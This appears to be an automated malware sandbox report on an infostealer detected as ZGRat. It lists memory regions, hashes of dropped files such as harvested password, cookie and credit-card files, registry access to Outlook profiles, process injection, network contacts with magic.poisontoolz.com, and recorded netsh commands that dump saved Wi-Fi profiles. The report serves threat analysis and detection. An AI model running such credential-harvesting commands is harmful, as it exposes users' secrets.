memory/3972-99-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-101-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-103-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/456-104-0x000001C442E70000-0x000001C442E80000-memory.dmp
memory/3972-108-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-106-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-113-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-115-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-111-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-97-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-93-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-91-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-89-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-85-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-121-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-131-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-143-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-141-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-139-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-137-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-135-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-133-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-129-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-127-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-125-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-123-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-119-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-117-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-83-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/456-288-0x000001C442E80000-0x000001C442ED0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Passwords.txt
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt
| MD5 | 412ec159e4b14be1ca93db473e80acc2 |
| SHA1 | 8909b6f7fc8715a749270b6ceb8f05f823f59fd3 |
| SHA256 | eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe |
| SHA512 | a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4 |
C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt
| MD5 | ae0f7fab163139c661e576fe0af08651 |
| SHA1 | 7545ab94360fd93f2209021b4cecabb92592be27 |
| SHA256 | 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657 |
| SHA512 | a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b |
C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt
| MD5 | 0f5f7a38759e578c92bcf62c45d80b8a |
| SHA1 | 211e70ede55cce5bf67f685d85cbd030a8517d2b |
| SHA256 | 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc |
| SHA512 | 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d |
memory/3972-79-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/456-78-0x000001C4285A0000-0x000001C428718000-memory.dmp
memory/2908-77-0x00007FFEA6180000-0x00007FFEA6C41000-memory.dmp
memory/456-76-0x00007FFEA6180000-0x00007FFEA6C41000-memory.dmp
memory/3972-75-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-73-0x0000000004BE0000-0x0000000004CC8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rock.exe
| MD5 | 55c1e65b9e7ac557b4c076d1b06e975a |
| SHA1 | 66bff0bd3d9a0acd309d2cc345ef20cf0983ce24 |
| SHA256 | 0c5834d8e470877274399911bf41aca8dfe1b78c56b2eef989ae6dda2eb99ddb |
| SHA512 | 1842ef859e86f99b8fc7cf41b7f79d39ef33d9dccb630c1a6b9ddf1723d35905b73a8ae2971554bdd9ccf3a8517f32c08209e45bca842ca519312276c274c7ba |
memory/3972-67-0x0000000000350000-0x00000000003EC000-memory.dmp
memory/3972-69-0x0000000074E00000-0x00000000755B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
| MD5 | f9b52117a18922a656813c19c900e1a0 |
| SHA1 | 5799c4228d6567a1335e338f15c4912eeef0a2a2 |
| SHA256 | 7b60894783f90113c994ca42f60ec47db34e7e99aa01de2e2f7e03b840db304a |
| SHA512 | e7377913c9215fdd2b1be050f225defcd3182b4b9a5a0d4ff2ddb1e6ecc84ee20dfea58fca514819a0206deec8f3ea1ef64c2598b68869f0218ab9cae0c4f921 |
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
| MD5 | f189e88b77130e0dbef360901a49b75f |
| SHA1 | 4889b7a7907d01653e9030e282d00ad637249061 |
| SHA256 | 326ad5539723ddc92995ae4f22ad0d99f8202c7d759d7c65e8204f2303fedd94 |
| SHA512 | db3138ed6f472f52e7e52fce37b4808b27eaa83d5f4d3fbc1bdc8149d2ded7c9a1e3e6bf9bb00fe60a654884d54da0cadfb6fe18cabb972316fb31bd35930f8a |
memory/456-809-0x00007FFEA6180000-0x00007FFEA6C41000-memory.dmp
memory/3972-2327-0x0000000004E00000-0x0000000004E4C000-memory.dmp
memory/3972-2326-0x0000000004D20000-0x0000000004D76000-memory.dmp
memory/3972-2328-0x0000000005100000-0x0000000005154000-memory.dmp
memory/3972-2331-0x0000000074E00000-0x00000000755B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f0703cbb7d230784f16f051935e13267 |
| SHA1 | ea7120074ca0bd261431e4de812eb853748bf3fb |
| SHA256 | d1eb588b0f67f2f65a69dd3152f9351db6746be59c83d55f104bf31b8f8abf42 |
| SHA512 | 6002a89265a2b33c1c1e51859e2df65a6d207a235c4e17c039362b7d95cafc217a151d5386be42caafe71b24150687001db464f28cdbeaab28dec2468865ce6c |
memory/4704-2340-0x000001E97C9C0000-0x000001E97C9D0000-memory.dmp
memory/4704-2339-0x000001E97C9C0000-0x000001E97C9D0000-memory.dmp
memory/4704-2348-0x00007FFEA6000000-0x00007FFEA6AC1000-memory.dmp
memory/4704-2338-0x00007FFEA6000000-0x00007FFEA6AC1000-memory.dmp
memory/4704-2337-0x000001E97EAB0000-0x000001E97EAD2000-memory.dmp
C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe
| MD5 | 0e103855aba5d5d4e78d92694c113cec |
| SHA1 | f77845a6b5793f276c904de52b03634bfbeea6ae |
| SHA256 | 5713320a6d17f3c597e2dda9ace84f51faa3570323f1ba02a30baa62f07013c0 |
| SHA512 | 9521451b24d5654dd2f11257530bfc116645b7e123a5f55f20f7123707a5e05603f919989a9ddd2f73abe91d22fed434080b509bab15cebdb495006bee476eef |
memory/3756-2352-0x00000000051F0000-0x0000000005200000-memory.dmp
memory/3756-2351-0x0000000074E00000-0x00000000755B0000-memory.dmp
C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe
| MD5 | 00e55127fe6b8edb0071c2a557fab93c |
| SHA1 | 0f9017dcbf0939a341bf4a5f4040fa02dc4affb4 |
| SHA256 | c6631aee4cc4e511bd16289e1abf3cef7668d63d5e0467acf7e22dafcf18caa2 |
| SHA512 | 81e53ae890f520e247ba477bc173e669cef49d9c73ccd2d16695120aee8face53d4f4b3adb79950a7b3bfcd59ebfe1830db33e47e00322ee7d3f800fcab7666b |
memory/5004-4559-0x0000000004F80000-0x0000000004F90000-memory.dmp
memory/5004-4560-0x0000000074E00000-0x00000000755B0000-memory.dmp
memory/3756-4589-0x0000000074E00000-0x00000000755B0000-memory.dmp
memory/4760-6264-0x0000021273120000-0x0000021273130000-memory.dmp
memory/4760-6262-0x00007FFEA6120000-0x00007FFEA6BE1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/4760-6780-0x00007FFEA6120000-0x00007FFEA6BE1000-memory.dmp
memory/3200-6785-0x0000000000F30000-0x0000000000F4C000-memory.dmp
memory/3200-6787-0x00000000058A0000-0x00000000058B0000-memory.dmp
memory/3200-6786-0x0000000074E00000-0x00000000755B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
| MD5 | f3ed43acd7d035e8c6035c7d65ec60bf |
| SHA1 | 679c01b051cbd42b740a05f0cd2807b16bae5aec |
| SHA256 | 136f29247b40b1cd3e65d093fd0529d6115ade980092b6a950d461b5c046daef |
| SHA512 | fc5b4dd5abc2e8e141b25ed4bd77509a0af1ce24b695e44b563ad93192f74c0dd147e4eb0e9da7052459b4dec975d6c99d842f77dc4e002a3631dc27a9ff4db5 |
C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
| MD5 | 1a9ac8aa754a986cccb6580f1494b813 |
| SHA1 | 3f99084894df1307c1cc22228d22e075d461344e |
| SHA256 | c4c16b46ca26315f46e2fc97dd93646064c9c06098c0aecc1cf3851b4eb4d1b2 |
| SHA512 | 4fdc5869fa38faf95200a70eb069b1ed6987c3085fbad4940b877eebc4b6a723c492ead79938d00843e86f4fc9c40a64c7d4ccd3ea64b7128b763c9300319b8f |
memory/3200-6788-0x00000000062B0000-0x00000000063E6000-memory.dmp
memory/5004-7281-0x0000000004F80000-0x0000000004F90000-memory.dmp
memory/5004-7290-0x0000000074E00000-0x00000000755B0000-memory.dmp
memory/3200-7723-0x00000000063F0000-0x00000000063F1000-memory.dmp
memory/3200-7724-0x00000000064C0000-0x000000000658E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wqjqot.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
memory/1924-7732-0x0000000005380000-0x0000000005412000-memory.dmp
memory/1924-7733-0x00000000054E0000-0x00000000054F0000-memory.dmp
memory/1924-7734-0x0000000006110000-0x000000000611A000-memory.dmp
memory/3200-7731-0x0000000074E00000-0x00000000755B0000-memory.dmp
memory/1924-7730-0x0000000074E00000-0x00000000755B0000-memory.dmp
memory/1924-7729-0x0000000000400000-0x0000000000578000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Cookies.txt
| MD5 | 824ce7c07117a630e9b31638f89476aa |
| SHA1 | 2d012f1cd8b636de1662f69d213b3cf9fa5df846 |
| SHA256 | 4d1a2351c6146b7f0cc87825160516933201af5e737028b360d4ee8d0ca7fdfd |
| SHA512 | 0c0d50920055b3a2343154acbe8e6d1a3490ce7ae403a21a9b385309805338ba05163500439ab85d30d1d2bb5c742009bb2b0c25d74533ba24780d31efe5c945 |
memory/1924-7735-0x0000000008A70000-0x0000000008AC0000-memory.dmp
memory/1924-7775-0x0000000074E00000-0x00000000755B0000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\down.png
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.189.79.40.in-addr.arpa | udp |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| NL | 52.142.223.178:80 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
128s
Max time network
130s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 640 set thread context of 4480 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Buildcrypt.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 90.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | evcs-ocsp.ws.symantec.com | udp |
| US | 152.199.19.74:80 | evcs-ocsp.ws.symantec.com | tcp |
| US | 8.8.8.8:53 | 74.19.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.179.17.96.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| N/A | 162.159.133.233:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| IN | 52.140.118.28:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.18.115.97:80 | tcp | |
| IN | 52.140.118.28:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.166.126.56:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.77.160.28:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.18.115.97:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 151.80.29.83:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 136.175.8.205:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.18.115.97:80 | tcp | |
| N/A | 162.159.133.233:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | udp |
Files
memory/640-0-0x0000000074CA0000-0x0000000075450000-memory.dmp
memory/640-1-0x0000000000740000-0x000000000075C000-memory.dmp
memory/640-2-0x0000000005100000-0x0000000005110000-memory.dmp
memory/640-3-0x0000000006C00000-0x0000000006E0A000-memory.dmp
memory/640-4-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-5-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-9-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-7-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-11-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-15-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-19-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-23-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-27-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-31-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-35-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-37-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-39-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-43-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-45-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-47-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-49-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-51-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-53-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-57-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-61-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-63-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-65-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-67-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-59-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-55-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-41-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-33-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-29-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-25-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-21-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-17-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-13-0x0000000006C00000-0x0000000006E04000-memory.dmp
memory/640-936-0x0000000002B70000-0x0000000002B71000-memory.dmp
memory/640-938-0x0000000006F80000-0x0000000006FCC000-memory.dmp
memory/640-937-0x0000000007110000-0x00000000072B2000-memory.dmp
memory/640-939-0x0000000007920000-0x0000000007EC4000-memory.dmp
memory/640-945-0x0000000074CA0000-0x0000000075450000-memory.dmp
memory/4480-944-0x0000000074CA0000-0x0000000075450000-memory.dmp
memory/4480-943-0x0000000000400000-0x0000000000592000-memory.dmp
memory/4480-946-0x0000000005710000-0x0000000005776000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Buildcrypt.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
memory/4480-947-0x00000000057C0000-0x00000000057D0000-memory.dmp
memory/4480-953-0x0000000006030000-0x0000000006038000-memory.dmp
memory/4480-952-0x0000000006000000-0x0000000006026000-memory.dmp
memory/4480-951-0x0000000005F70000-0x0000000006002000-memory.dmp
memory/4480-955-0x0000000006E60000-0x0000000006E68000-memory.dmp
memory/4480-956-0x0000000006E80000-0x0000000006E9E000-memory.dmp
memory/4480-954-0x0000000006E50000-0x0000000006E5A000-memory.dmp
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
memory/4480-1013-0x00000000077B0000-0x0000000007842000-memory.dmp
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\Process.txt
| MD5 | 1ee536f8825f6e2687ef66d381d8f207 |
| SHA1 | 226510773d4cce296c65a148113cc8748dcd2eb5 |
| SHA256 | 17f9cee741ac5c44270e2e06cffe0733c0048eeff575a722552ab3faa60c22e4 |
| SHA512 | 0e7be43674727276b6a1ca1b1b96cca435f9dc1feefce7a150632f171313b365ee59bc842244c6dfaf53b951bff3f9cad781ea70795cfed163db767f50a55e7f |
memory/4480-1113-0x00000000057C0000-0x00000000057D0000-memory.dmp
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\Apps.txt
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/4480-1148-0x0000000006FE0000-0x000000000705A000-memory.dmp
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\Apps.txt
| MD5 | b1d58554f33c991f9454f81bf1f6a7a6 |
| SHA1 | 1a9c0748fbb4c4974315f6a3188ffb5078372de1 |
| SHA256 | 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c |
| SHA512 | ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6 |
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\Directories\Videos.txt
| MD5 | 1fddbf1169b6c75898b86e7e24bc7c1f |
| SHA1 | d2091060cb5191ff70eb99c0088c182e80c20f8c |
| SHA256 | a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733 |
| SHA512 | 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d |
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\Admin@IMXSDNYJ_en-US\Directories\Startup.txt
| MD5 | 68c93da4981d591704cea7b71cebfb97 |
| SHA1 | fd0f8d97463cd33892cc828b4ad04e03fc014fa6 |
